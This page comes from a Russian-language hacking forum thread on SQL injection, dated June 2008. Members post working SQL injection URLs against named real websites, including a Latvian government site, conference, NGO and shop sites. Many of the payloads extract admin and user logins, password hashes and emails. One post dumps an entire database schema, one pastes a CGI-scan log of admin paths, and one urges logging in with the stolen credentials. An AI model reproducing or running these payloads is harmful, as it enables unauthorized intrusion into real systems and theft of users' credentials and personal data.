ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 565 из 1242 « Первая < 65465515555 561 562 563 564 565 566 567 568 569 5756156651065 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5641  
Старый 07.06.2008, 17:35
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Цитата:
Сообщение от tor4)  
Прошу помаши в проведение sql mssql,
Вытащил имена таблиц, но тармазнулcя на колонках.
С mssql в первые, не понимаю как подбираются ('column')






------------Модератор---------------
Просьба не удалять если не кто не проявит желания отредактирую.
Статьи для кого пишут?
http://www.inattack.ru/article/275.html
http://www.inattack.ru/article/163.html
.. поиск по форуму находится слева
 
Ответить с цитированием

  #5642  
Старый 07.06.2008, 20:39
Аватар для А®ТеS
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
erostory.ru
Цитата:
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=-1+union+select+1,concat_ws(0x3a,VERSION(),DATABASE (),USER()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+FROM+erostory_db.autors+LIMIT+0,1--+
Порнуха в текстовом виде xD.

Интересные запросы к интересным таблицам:
Цитата:
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=-1+union+select+1,concat_ws(0x3a,ID,name,email,city ,url,date,pass,status,ip),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18+FROM+erostory_db.autors+LIMIT+0,1--+
Логиниться с этими данными в http://www.erostory.ru/autor.php .

Цитата:
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=5082+u nion+select+1,concat_ws(0x3a,ID,pass),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18+FROM+erostory_db.admi nip--+
Цитата:
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=5082+u nion+select+1,concat_ws(0x3a,login,pass,status),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+FROM+erosto ry_db.links_admins--+
Как попасть в админку: хз. Просканил CGI-сканером Pelmeshko:
Код:
---------------------------------------------
[i] Starting scan.
[i] Start time: Sat Jun  7 19:49:05 2008
[i] Targer host/path: erostory.ru/
[i] Targer port/SSL: 80 | 0
---------------------------------------------[*] 404 Probe request to server. Server answering with HTTP/1.1 404 Not Found[*] Server Headers:[*]   Server: Apache/2[*] Database Cgi's:[*]   Rootdir found: erostory.ru/cgi-bin/[*] Database Common:[*]   Rootdir found: erostory.ru/[*]   [403] Found: erostory.ru/admin/[*]   [403] Found: erostory.ru/administration/[*]   [403] Found: erostory.ru/admins/[*]   [403] Found: erostory.ru/cgi-bin/[*]   [302] Found: erostory.ru/config/[*]   [403] Found: erostory.ru/error/[*]   [403] Found: erostory.ru/images/[*]   [403] Found: erostory.ru/img/[*]   [403] Found: erostory.ru/picture/[*]   [200] Found: erostory.ru/robots.txt[*]   [403] Found: erostory.ru/.htaccess[*]   [403] Found: erostory.ru/.htpasswd[*]   [403] Found: erostory.ru/.htaccess~[*]   [403] Found: erostory.ru/.htpasswd~[*]   [403] Found: erostory.ru/admin-a/[*]   [403] Found: erostory.ru/server-status/
---------------------------------------------[*] Scan finished at Sat Jun  7 19:53:28 2008. Total 817 objects scanned
---------------------------------------------
Куча админок, но все 403 Forbidden. Может админа по IP-адресу определяют, я хз...
 
Ответить с цитированием

  #5643  
Старый 08.06.2008, 03:09
Аватар для lastsmile
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
Провел на форуме:
255505

Репутация: 22
По умолчанию
http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,version(),3,4,user()/*

version() 4.1.22
user() flirtani@localhost

не стал подбирать колонки, не люблю 4-ую версию за это :-(
----------------------------------
http://www.webapplist.com/category.php?id=-1'+union+select+1,2,3,4/*

а здесь не смог подобрать кол-во колонок, дошел до 100 но все равно: The used SELECT statements have a different number of columns

посмотрите если кому интересно...
Последний раз редактировалось lastsmile; 08.06.2008 в 03:20..
 
Ответить с цитированием

  #5644  
Старый 08.06.2008, 04:02
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию
http://www.ittconference.ie
Код:
http://www.ittconference.ie/main.php?ID=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6,7+from+itt_reviewer+limit+0,1/*
http://www.curacaodolphintherapy.com/
Код:
http://www.curacaodolphintherapy.com/main.php?id=-1+union+select+1,2,concat_ws(0x3a,id,username,password,admin),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+limit+0,1/*
 
Ответить с цитированием

  #5645  
Старый 08.06.2008, 04:03
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию
http://www.eicta.org/index.php?id=32&id_article=93'
http://www.paintball.ru/next.php?id=999919+union+select+1,2,VERSION()
http://www.comingsoon.net/films.php?id=1+union+select+VERSION()
http://www.fcdynamo.ru/players.php?id=-1'+union+select+table_name+from+information_schema .tables+limit+59,1/*
http://expressorder.ru/forum/message.php?id=11'
http://www.hpol.org/record.php?id=72
http://www.mymaika.ru/catalog.php?id=181'
http://www.fm.gov.lv/index.php?id=8'
http://www.mtas.ru/second.php?ID=-243+union+select+1/*
http://opel.avto-city.ru/catalog.php?id=-3+union+select+1,2,3,4,5,6,7/*
http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name='admins'+lim it+1,1/*
http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,concat(admin_name,0x3a,admin_pa ssword),4,5,6,7+from+admins+limit+5,1/*
http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,2,3,4,VERSION()/*
http://www.rudtp.ru/articles.php?id=44+union+select+1,2,3,4,5,6,7/*
http://www.acte.org/resources/press_release.php?id=-284+union+select+1,2,3,4,5,6,7,8,9/*
http://www.analisi.ru/regulations.php?id=-3+union+select+1,2,3,4/*
http://ansijournals.com/3/c4p.php?id=1'&theme=3&jid=itj
http://www.bmoca.org/artist.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25/*
http://www.chinesejetpilot.com/index.php?ID=-202+union+select+1,2,3,4,5,6/*
http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+1/*
http://zoorinok.com.ua/razdel/&podrazdel=-306+union+select+1,VERSION(),3,4,5,6/*
================================================== =============
lastsmile,я твою первую скулю давненько нашел,но ты оказался тут первым=)
 
Ответить с цитированием

  #5646  
Старый 08.06.2008, 11:38
Аватар для $p01nt
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию
www.glaad.org

Уязвимость:

Код:
http://www.glaad.org/media/resource_kit_detail.php?id=3457'
Колонки:

Код:
http://www.glaad.org/media/resource_kit_detail.php?id=-3457+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
Информация о базе:

Код:
glaad_www_1
4.0.12-standard
glaad@localhost
 
Ответить с цитированием

  #5647  
Старый 08.06.2008, 12:26
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию
www.suter.ru

Сайт российских сутенеров

Цитата:
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1&table=cras
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1<ascii(subs tring((SELECT+table_name+FROM+information_schema.t ables+limit+63,1),1,1))&table=cras
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1<ascii(subs tring((SELECT+column_name+FROM+information_schema. columns+WHERE+table_name+like+'sites'+limit+1,1),1 ,1))&table=cras
VERSION() - 5.1.11-beta
USER() - xstars_u@localhost
DATABASE() - db_xstars_u


Структура таблиц
Код:
**************************
	agent
--------------------------		
	name		
	cvet	
**************************
	attak
--------------------------
	ip	
	k-vo	
	interval	
	adres	
	site	
	otprmail
**************************
	buf
--------------------------
	ip	
	vrem	
	adres	
	site	
**************************
	clicks
--------------------------
	ip	
	banner_id	
	time	
	referer	
**************************
	club
--------------------------
	name	
	name_en	
	opisanie	
	opisanie_en	
	photo	
	link	
	data	
	block	
**************************
	sessions
--------------------------
	uid	
	expire	
	ip	
**************************
	sites
--------------------------
	site	
	log	
	posl	
	poslstr	
	id	
	name	
**************************
	users
--------------------------
	name	
	email	
	transfer	
	phone	
	site	
	password
**************************
	devk
--------------------------
	new	
	name	
	name_en	
	prioritet	
	rate	
	id_goroscop	
	razmer	
	rost	
	ves	
	grud	
	vozrast	
	id_gorod	
	id_metro	
	adres	
	mail	
	club	
	text	
	text_en	
	hour_app	
	hour2_app	
	night_app	
	hour_out	
	hour2_out	
	night_out	
	sutki	
	valut	
	photosmall	
	time_block	
	data	
	block	
	prosmotr	
	penis	
	kto	
	chya	
	blockind	
**************************
	dnevniky
--------------------------
	nazv	
	smtext	
	text	
	links	
	date	
**************************
	foto
--------------------------
	id_devk	
	foto		
**************************
	gorod
--------------------------
	name	
	name_en	
**************************
	goroscop
--------------------------
	name	
	name_en	
**************************
	message
--------------------------
	r_id	
	name	
	subject	
	msg	
	email	
	m_date	
	ip
**************************
	message1
--------------------------
	id_devk	
	nick	
	mess	
	data
**************************
	message_en
--------------------------
	r_id	
	name	
	subject	
	msg	
	email	
	m_date	
	ip
**************************
	metro
--------------------------
	name	
	name_en	
**************************
	param
--------------------------
	mned	
	ened	
	kned	
	pned	
	transned
**************************
	podrugy
--------------------------
	podruga_id
**************************
	poll_alternatives
--------------------------
	alternative	
	votes	
	id
**************************
	polls
--------------------------
	question	
	active	
	dateactive	
	votes
**************************
	polz
--------------------------
	login	
	pass	
	mail	
	balance	
**************************
	site_news
--------------------------
	nazv	
	text	
	date
**************************
	soedcp
--------------------------
	id_club	
**************************
	soeddp
--------------------------
	id_devk	
**************************
	suter_cras
--------------------------
	name	
	block	
**************************
	suter_crast
--------------------------
	id_cras	
	nazv	
	text	
	date
**************************
	suter_lgesotr
--------------------------
	block	
	name	
	text	
	foto1	
	foto2	
	foto3	
	gorod	
	ip	
	datetime
**************************
	suter_nazam
--------------------------
	name	
	block
**************************
	suter_nazamt
--------------------------
	id_nazam	
	nazv	
	text	
	date
**************************
	suter_psevdoklienty
--------------------------
	name	
	ip	
	mail	
	telephone	
	telephone2	
	mbtelephone	
	mb2telephone	
	name_ps	
	adres	
	avto	
	soobsh	
	date	
**************************
	suter_rassilk
--------------------------
	mail	
	ip	
	date
**************************
	suter_urb
--------------------------
	name	
	block	
**************************
	suter_urbt
--------------------------
	id_urb	
	nazv	
	text	
	date
**************************
	svaz_uslug
--------------------------
	id_usl	
**************************
	telephone
--------------------------
	id_club	
	operator
**************************
	telephoneind
--------------------------
	tel	
	operator
**************************
	uslugy
--------------------------
	name	
	name_en	
	kto
**************************
	video
--------------------------
	id_devk	
	namev	
	data
**************************
	x_news
--------------------------
	nazv	
	nazv_en	
	smtext	
	smtext_en	
	text	
	text_en	
	img	
	date	
**************************
 
Ответить с цитированием

  #5648  
Старый 08.06.2008, 15:46
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию
proretail.com.ua

Цитата:
http://proretail.com.ua/kont.php?c_i=-1+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMA TION_SCHEMA.TABLES/*
Цитата:
http://proretail.com.ua/kont.php?c_i=-1+union+select+1,2,concat_ws(0x3a,login,pas,mail), 4,5,6,7+from+user/*
Цитата:
http://media-intelligence-partners.com/briefings.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8/*
 
Ответить с цитированием

  #5649  
Старый 08.06.2008, 16:03
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию
pastebin.ru
Случайно найдена Chaak`ом и мной..

постим что-то типа кода (не указывая имя):

Цитата:
'
U0NSSVBUX05BTUU=','MS4x','Yg==','eQ==','IA==','RA= =','WA==','IA=='
,-union+select+1,2'
резалт:
Цитата:
Query failure: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2\' ?>',294388)' at line 2
insert into pastebin (poster, posted, code, parent_pid) values ('Гость',now(),'',294388);
 
Ответить с цитированием

  #5650  
Старый 08.06.2008, 17:25
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,1 
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
Код:
http://www.autometaldirect.com/content.php?page=-118+union+select+1,2,concat_ws(0x3a,useremail,userpassword),4,null,6,7,8,9,10,11,12 
+from+user/*
 
Ответить с цитированием
Ответ
Страница 565 из 1242 « Первая < 65465515555 561 562 563 564 565 566 567 568 569 5756156651065 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ